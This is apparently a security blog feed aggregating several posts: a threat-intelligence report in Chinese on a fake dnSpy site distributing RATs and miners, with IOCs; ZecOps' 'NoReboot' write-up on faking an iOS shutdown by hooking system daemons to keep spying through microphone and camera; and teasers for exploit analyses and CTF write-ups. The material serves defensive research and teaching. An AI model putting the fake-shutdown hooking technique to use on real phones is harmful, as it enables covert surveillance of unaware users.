“Advanced Kernel Programming” is a new class I’m planning, suitable for those who participated in “Windows Kernel Programming” (or have equivalent knowledge). This course will cover file system mini-filters, NDIS filters, and the Windows Filtering Platform (WFP), along with other advanced programming techniques.

I may add more classes after September, but it’s too far from now to make such a commitment.

If you are interested in one or more of these classes, please write an email to [email protected], and provide your name, preferred contact email, and your time zone. It’s not a commitment on your part, you may change your mind later on, but it should be genuine, where the dates and topics work for you.

Also, if you have other classes you would be happy if I deliver, you are welcome to suggest them. No promises, of course, but if there is enough interest, I will consider creating and delivering them.

If you’d like a private class for your team, get in touch. Syllabi can be customized as needed.

Have a great year ahead!

Rings

zodiacon

Malware Analysis: Ragnarok Ransomware

By: voidsec
28 April 2021 at 08:13

The analysed sample is a malware employed by the Threat Actor known as Ragnarok. The ransomware is responsible for files’ encryption and it is typically executed, by the actors themselves, on the compromised machines. The name of the analysed executable is xs_high.exe, but others have been found used by the same ransomware family (such as […]

The post Malware Analysis: Ragnarok Ransomware appeared first on VoidSec.

Fake dnSpy - 当黑客也不讲伍德

By: liuchuang
12 January 2022 at 13:06

前景提要

dnSpy是一款流行的用于调试,修改和反编译.NET程序的工具。网络安全研究人员在分析 .NET 程序或恶意软件时经常使用。

2022 年1月8日, BLEEPING COMPUTER 发文称, 有攻击者利用恶意的dnSpy针对网络安全研究人员和开发人员发起了一次攻击活动。@MalwareHunterTeam 发布推文披露了分发恶意dnSpy编译版本的Github仓库地址,该版本的dnSpy后续会安装剪切板劫持器, Quasar RAT, 挖矿木马等。

image

image_1

查看 dnSpy 官方版的 Git,发现该工具处于Archived状态,在2020年就已经停止更新,并且没有官方站点。
2022-01-11-19-15-52

攻击者正是借助这一点,通过注册 dnspy[.]net 域名, 设计一个非常精美的网站, 来分发恶意的dnSpy 程序。
image_2
同时购买Google搜索广告, 使该站点在搜索引擎的结果排名前列,以加深影响范围。
2022-01-11-19-19-54

截止 2022 年 1 月 9 日, 该网站已下线

样本分析

dnspy[.]net 下发的为 dnSpy 6.1.8 的修改版,该版本也是官方发布的最后一个版本。

通过修改dnSpy核心模块之一的dnSpy.dll入口代码来完成感染。

dnSpy.dll正常的入口函数如下:

image_3

修改的入口添加了一个内存加载的可执行程序

image_4-1

该程序名为dnSpy Reader

image_5

并经过混淆

image_6

后续会通过mshta下发一些挖矿,剪切板劫持器,RAT等
2022-01-11-19-27-48

Github

攻击者创建的两个 github 分别为:

  • https[:]//github[.]com/carbonblackz/dnSpy
  • https[:]//github[.]com/isharpdev/dnSpy

其中使用的用户名为:isharpdev 和 carbonblackz,请记住这个名字待会儿我们还会看到它

资产拓线

通过对dnspy[.]net的分析,我们发现一些有趣的痕迹进而可对攻击者进行资产拓线:

dnspy.net

域名 dnspy[.]net 注册时间为2021年4月14日。

image_7

该域名存在多个解析记录, 多数为 Cloudflare 提供的 cdn 服务, 然而在查看具体历史解析记录时,我们发现在12月13日- 01月03日该域名使用的IP为45.32.253[.]0 , 与其他几个Cloudflare CDN服务的IP不同,该IP仅有少量的映射记录。

image_8

查询该IP的PDNS记录, 可以发现该IP映射的域名大多数都疑似为伪造的域名, 且大部分域名已经下线。

image_9

这批域名部分为黑客工具/办公软件等下载站点,且均疑似为某些正常网站的伪造域名。

2022-01-11-20-02-22

以及披露事件中的dnspy.net域名, 基于此行为模式,我们怀疑这些域名均为攻击者所拥有的资产,于是对这批域名进行了进一步的分析。

关联域名分析

toolbase[.]co 为例, 该域名历史为黑客工具下载站点, 该网站首页的黑客工具解压密码为 “CarbonBlackz”, 与上传恶意 dnspy 的 Github 用户之一的名字相同。

image_10

该站点后续更新页面标题为 Combolist-Cloud , 与45.32.253[.]0解析记录中存在的combolist.cloud域名记录相同, 部分文件使用 mediafire 或 gofile 进行分发。

image_11

该域名疑似为combolist[.]top的伪造站点, combolist[.]top 是一个提供泄露数据的论坛。

image_12

torfiles[.]net也同样为一个软件下载站。

image_13

Windows-software[.]co以及windows-softeware[.]net均为同一套模板创建的下载站。

image_14

image_15

shortbase[.]net拥有同dnspy[.]net一样的CyberPanel安装页面.且日期均为2021年12月19日。

image_16

下图为dnspy[.]net在WaybackMachine记录中的CyberPanel的历史安装页面。

image_17

coolmint[.]net同样为下载站, 截止 2022 年1月12日依然可以访问.但下载链接仅仅是跳转到mega[.]nz

image_18

filesr[.]nettoolbase[.]co为同一套模板

image_19

此站点的About us 都未做修改,

image_20

该页面的内容则是从FileCR[.]com的About us页面修改而来

2022-01-11-19-57-10

filesr[.]net的软件使用dropbox进行分发,但当前链接均已失效

最后是zippyfiles[.]net, 该站点为黑客工具下载站
2022-01-11-19-53-30
我们还在reddit上发现了一个名为tuki1986的用户两个月前一直在推广toolbase[.]cozippyfiles[.]net站点。

2022-01-11-20-41-21
该用户在一年前推广的网站为bigwarez[.]net

2022-01-11-20-58-43-1
查看该网站的历史记录发现同样为一个工具下载站点,且关联有多个社交媒体账号。

2022-01-12-21-03-15
推特@Bigwarez2

2022-01-11-21-05-11
Facebook@software.download.free.mana

2022-01-11-21-06-54

该账号现在推广的网站为itools[.]digital,是一个浏览器插件的下载站。
2022-01-11-21-18-54

Facebook组@free.software.bigwarez

2022-01-11-21-14-23

领英 - 当前已经无法访问
@free-software-1055261b9

tumblr@bigwarez

2022-01-11-21-12-50

继续分析tuki1986的记录发现了另一个网站blackos[.]net

2022-01-11-21-24-33

该网站同样为黑客工具下载站点

2022-01-11-21-27-38

且在威胁情报平台标注有后门软件

2022-01-12-01-33-08

通过该网站发现有一个名为sadoutlook1992的用户,从18年即开始在各种黑客论坛里发布挂马的黑客工具。

2022-01-12-01-39-59
2022-01-12-01-40-42
2022-01-12-01-41-27

在其最新的活动中,下载链接为zippyfiles[.]net

2022-01-12-01-43-26

从恶意的Gihubt仓库及解压密码可知有一个用户名为”CarbonBlackz”, 使用搜索引擎检索该字符串, 发现在知名的数据泄露网站raidforums[.]com有名为“Carbonblackz”的用户。

image_23

同样的在俄语的黑灰产论坛里也注册有账号,这两个账号均未发布任何帖子和回复,疑似还未投入使用。

image_24

其还在越南最大的论坛中发布软件下载链接:

image_25

image_26

归因分析

通过查看这些域名的WHOIS信息发现, filesr[.]net的联系邮箱为[email protected]

image_22

查询该邮箱的信息关联到一位35岁,疑似来自俄罗斯的人员。

2022-01-12-00-40-11

carbon1986tuki1986这两个ID来看,1986疑似为其出生年份,同时也符合35岁的年龄。

根据这些域名的关联性,行为模式与类似的推广方式,我们认为这些域名与dnspy[.]net的攻击者属于同一批人。

2022-01-12-02-45-11

这是一个经过精心构建的恶意组织,其至少从2018年10月即开始行动,通过注册大量的网站,提供挂马的黑客工具/破解软件下载,并在多个社交媒体上进行推广,从而感染黑客,安全研究人员,软件开发者等用户,后续进行挖矿,窃取加密货币或通过RAT软件窃取数据等恶意行为。

结论

破解软件挂马已经屡见不鲜,但对于安全研究人员的攻击则更容易中招,因为一些黑客工具,分析工具的敏感行为更容易被杀软查杀,所以部分安全研究人员可能会关闭防病毒软件来避免烦人的警告。

虽然目前该组织相关的恶意网站,gihub仓库以及用于分发恶意软件的链接大部分已经失效.但安全研究人员和开发人员还是要时刻保持警惕。对于各种破解/泄露的黑客工具建议在虚拟环境下运行,开发类软件,办公软件要从官网或正规渠道下载,且建议使用正版.以避免造成不必要的损失。

IOCs

dnSpy.dll - f00e0affede6e0a533fd0f4f6c71264d

  • ip
ip:
45.32.253.0

  • domain
zippyfiles.net
windows-software.net
filesr.net
coolmint.net
windows-software.co
dnspy.net
torfiles.net
combolist.cloud
toolbase.co
shortbase.net
blackos.net
bigwarez.net
buysixes.com
itools.digital
4api.net

Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

4 January 2022 at 20:49
Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

Mobile Attacker’s Mindset Series – Part II

Evaluating how attackers operate when there are no rules leads to discoveries of advanced detection and response mechanisms. ZecOps is proudly researching scenarios of attacks and sharing the information publicly for the benefit of all the mobile defenders out there.

iOs persistence is presumed to be the hardest bug to find. The attack surface is somewhat limited and constantly analyzed by Apple’s security teams.

Creativity is a key element of the hacker’s mindset. Persistence can be hard if the attackers play by the rules. As you may have guessed it already – attackers are not playing by the rules and everything is possible.

In part II of the Attacker’s Mindset blog we’ll go over the ultimate persistence bug: a bug that cannot be patched because it’s not exploiting any persistence bugs at all – only playing tricks with the human mind.

Meet “NoReboot”: The Ultimate Persistence Bug

We’ll dissect the iOS system and show how it’s possible to alter a shutdown event, tricking a user that got infected into thinking that the phone has been powered off, but in fact, it’s still running. The “NoReboot” approach simulates a real shutdown. The user cannot feel a difference between a real shutdown and a “fake shutdown”. There is no user-interface or any button feedback until the user turns the phone back “on”.

To demonstrate this technique, we’ll show a remote microphone & camera accessed after “turning off” the phone, and “persisting” when the phone will get back to a “powered on” state.

This blog can also be an excellent tutorial for anyone who may be interested in learning how to reverse engineer iOS.

Nowadays, many of us have tons of applications installed on our phones, and it is difficult to determine which among them is abusing our data and privacy. Constantly, our information is being collected, uploaded.

This story by Dan Goodin, speaks about an iOS malware discovered in-the-wild. One of the sentences in the article says: “The installed malware…can’t persist after a device reboot, … phones are disinfected as soon as they’re restarted.”.

The reality is actually a bit more complicated than that. As we will be able to demonstrate in this blog, we cannot, and should not, trust a “normal reboot”.

How Are We Supposed to Reboot iPhones?

According to Apple, a phone is rebooted by clicking on the Volume Down + Power button and dragging the slider.

Given that the iPhone has no internal fan and oftentimes it keeps its temperature cool, it’s not trivial to tell if our phones are running or not. For end-users, the most intuitive indicator that the phone is the feedback from the screen. We tap on the screen or click on the side button to wake up the screen.

Here is a list of physical feedback that constantly reminds us that the phone is powered on:

  • Ring/Sound from incoming calls and notifications
  • Touch feedback (3D touch)
  • Vibration (silent mode switch triggers a burst of vibration)
  • Screen
  • Camera indicator

“NoReboot”: Hijacking the Shutdown Event

Let’s see if we can disable all of the indicators above while keeping the phone with the trojan still running. Let’s start by hijacking the shutdown event, which involves injecting code into three daemons.

When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction.

We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.

In backboardd, we will hide the spinning wheel animation, which automatically appears when SpringBoard stops running, the magic spell which does that is [[BKSDefaults localDefaults]setHideAppleLogoOnLaunch:1]. Then we make SpringBoard exit and block it from launching again. Because SpringBoard is responsible for responding to user behavior and interaction, without it, the device looks and feels as if it is not powered on. which is the perfect disguise for the purpose of mimicking a fake poweroff.

Example of SpringBoard respond to user’s interaction: Detects the long press action and evokes Siri

Despite that we disabled all physical feedback, the phone still remains fully functional and is capable of maintaining an active internet connection. The malicious actor could remotely manipulate the phone in a blatant way without worrying about being caught because the user is tricked into thinking that the phone is off, either being turned off by the victim or by malicious actors using “low battery” as an excuse. 

Later we will demonstrate eavesdropping through cam & mic while the phone is “off”. In reality, malicious actors can do anything the end-user can do and more. 

System Boot In Disguise

Now the user wants to turn the phone back on. The system boot animation with Apple’s logo can convince the end-user to believe that the phone has been turned off. 

When SpringBoard is not on duty, backboardd is in charge of the screen. According to the description we found on theiphonewiki regarding backboardd.

Ref: https://www.theiphonewiki.com/wiki/Backboardd

“All touch events are first processed by this daemon, then translated and relayed to the iOS application in the foreground”. We found this statement to be accurate. Moreover, backboardd not only relay touch events, also physical button click events. 

backboardd logs the exact time when a button is pressed down, and when it’s been released. 

With the help from cycript, We noticed a way that allows us to intercept that event with Objective-C Method Hooking. 

A _BKButtonEventRecord instance will be created and inserted into a global dictionary object BKEventSenderUsagePairDictionary.  We hook the insertion method when the user attempts to “turn on” the phone.

The file will unleash the SpringBoard and trigger a special code block in our injected dylib. What it does is to leverage local SSH access to gain root privilege, then we execute /bin/launchctl reboot userspace. This will exit all processes and restart the system without touching the kernel. The kernel remains patched. Hence malicious code won’t have any problem continuing to run after this kind of reboot.

The user will see the Apple Logo effect upon restarting. This is handled by backboardd as well. Upon launching the SpringBoard, the backboardd lets SpringBoard take over the screen.

From that point, the interactive UI will be presented to the user. Everything feels right as all processes have indeed been restarted. Non-persistent threats achieved “persistency” without persistence exploits.

Hijacking the Force Restart Event?

A user can perform a “force restart” by clicking rapidly on “Volume Up”, then “Volume Down”, then long press on the power button until the Apple logo appears.

We have not found an easy way to hijack the force restart event. This event is implemented at a much lower level. According to the post below, it is done at a hardware level. Following a brief search in the iOS kernel, we can confirm that we didn’t see what triggers the force-restart event. The good news is that it’s harder for malicious actors to disable force restart events, but at the same time end-users face a risk of data loss as the system does not have enough time to securely write data to disk in case of force-restart events.

Misleading Force Restart

Nevertheless, It is entirely possible for malicious actors to observe the user’s attempt to perform a  force-restart (via backboardd) and deliberately make the Apple logo appear a few seconds earlier, deceiving the user into releasing the button earlier than they were supposed to. Meaning that in this case, the end-user did not successfully trigger a force-restart.  We will leave this as an exercise for the reader.

Ref: https://support.apple.com/guide/iphone/force-restart-iphone-iph8903c3ee6/ios

NoReboot Proof of Concept

You can find the source code of NoReboot POC here.

Never trust a device to be off

Since iOS 15, Apple introduced a new feature allowing users to track their phone even when it’s been turned off. Malware researcher @naehrdine wrote a technical analysis on this feature and shared her opinion on “Security and privacy impact”. We agree with her on “Never trust a device to be off, until you removed its battery or even better put it into a Blender.”

Checking if your phone is compromised

ZecOps for Mobile leverages extended data collection and enables responding to security events. If you’d like to inspect your phone – please feel free to request a free trial here.

2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: “At the time, no one knew what was coming.”

― Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly-ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (“His voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”) However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months due to reasons outside of her control. Unable to even take a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as “languishing” – the indeterminable void between depression and flourishing. To combat this, it suggested rediscovering one’s “flow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag a OpenAI’s GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security’s Exploit Developer course, which I then applied to my research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into the vulnerability research reminded me just how vast this ocean is; it’ll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spiderman will tell you. I suspect that “same same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Analysis of a VMWare Guest-to-Host Escape from Pwn2Own 2017

This vulnerability was found by Keen Security Lab which they showed at Pwn2Own 2017. Unfortunately, because the bug was silently patched by VMWare in 12.5.3 no CVE number was assigned, even though the vulnerability leads to remote code execution. Summary The vulnerability affects the Drag n Drop functionality of VMWare Workstation Pro before 12.5.3. This feature allows users to copy files from the host to the guest. However, due to a few insecure backdoor calls over an RPC interface, a Use-After-Free is present.

Supervisor Mode Execution Prevention

Supervisor Mode Execution Prevention is a CPU security feature which aims to prevent execution of untrusted memory while operating at a greater privilege level. In short, it detects so-called “ring0” (kernelspace) code that is running in “ring3” (userspace). History SMEP was first introduced in 2011 by Intel on the Ivy Bridge Architecture. It was designed in order to address classes of Local privilege Escalation (LPE) sometimes also known as Escalation of Privilege (EoP) attacks.

PaX - structleak

I am rather fascinated with exploit mitigations, especially ones by PaX. When I first started out in security I came to learn of PaX quite quickly, and since moving into the binary exploitation space the desire to understand more about how these mitigations are created and how they work has greatly increased. In light of that, today I am going to looking into “STRUCTLEAK”. Introduction STRUCTLEAK is a GCC plugin created by PaX team, their decision to make such a plugin was prompted by CVE-2013-2141 (more on this CVE shortly).

Setting up PwnDbg with Ghidra

25 September 2021 at 00:00
If you’re like me and more used to Windows tooling (even if you have Linux experience) it is a little difficult to setup some of this more complicated Rizin tooling. So, thought I would make a quick guide about setting up Pwndbg with Ghidra. As a WinDbg use, despite having used gdb before it has a lot of quirks. Quirks which are as easy to get used to as quirks that exist in WinDbg.

Automatic Reference Counting

19 September 2021 at 00:00
I was bored so I decided to make a blog post on what “Automatic Reference Counting” (ARC) is and more importantly how it can act as a mitigation for Use-After-Free vulnerabilities. As well as other heap-based memory management bugs such as memory leaks. Introduction Most of you will have probably heard of garbage collection, most likely in the context of Java. Someone might have said to you before “Java garbage collection is horrible”.

HackTheBox - Jeeves Writeup

19 September 2021 at 00:00
Getting Started This challenge is pretty easy but I just thought I’d explain it in a blog post real quick since I started doing some of the HTB pwn challenges. Reverse Engineering The challenge itself is just a simple gets() buffer overflow. As you can see in the code below, it takes our name via a gets() call. printf("Hello, good sir!\nMay I have your name? "); gets(input_buffer); printf("Hello %s, hope you have a good day!

Analysis of CVE-2017-12561

In this post I am going to perform root-cause analysis of a bug reported by Steven Seeley in HP iMC 7.3 E0504P04, specifically in the “dbman” service. Steven found a Use-After-Free condition in opcode 10012. I was given this task as a challenge and I had a lot of fun. I was not totally comfortable with heap-type bugs so it was a really nice challenge to learn more about the heap.

BAE x BSides Chelt CTF

Introduction BAE hosted a CTF the day before BSides Cheltenham. I played with my friends. There was a crypto challenge which I saw a number of people struggling with. The challenge only got three solved in total, I was the first to solve it, so I thought I’d make a writeup of how I did it. The Challenge The challenge was reminiscient of the ECB penguin problem in the sense that we had two picture files in .

OSCP Experience

OSCP Experience At the time of writing I just passed my OSCP and I thought I would follow the trend and make a blog post about my experience with both the exam and the course. Disclaimer: this post is old. The OSCP has undergone many updates since I took it, please keep that in mind. PWK Experience I originally was going to purchase 60 days however, in the end I decided to purchase 30 days.

HackTheBox - Sunday Writeup

Introduction This is a writeup for the machine “Sunday” (10.10.10.76) on the platform HackTheBox. HackTheBox is a penetration testing labs platform so aspiring pen-testers & pen-testers can practice their hacking skills in a variety of different scenarios. Enumeration NMAP We’ll start off with our usual full port nmap scan to see what kinda’ stuff is running on the box, I did also run a UDP scan too like usual however again in this case nothing was running on UDP.
❌
❌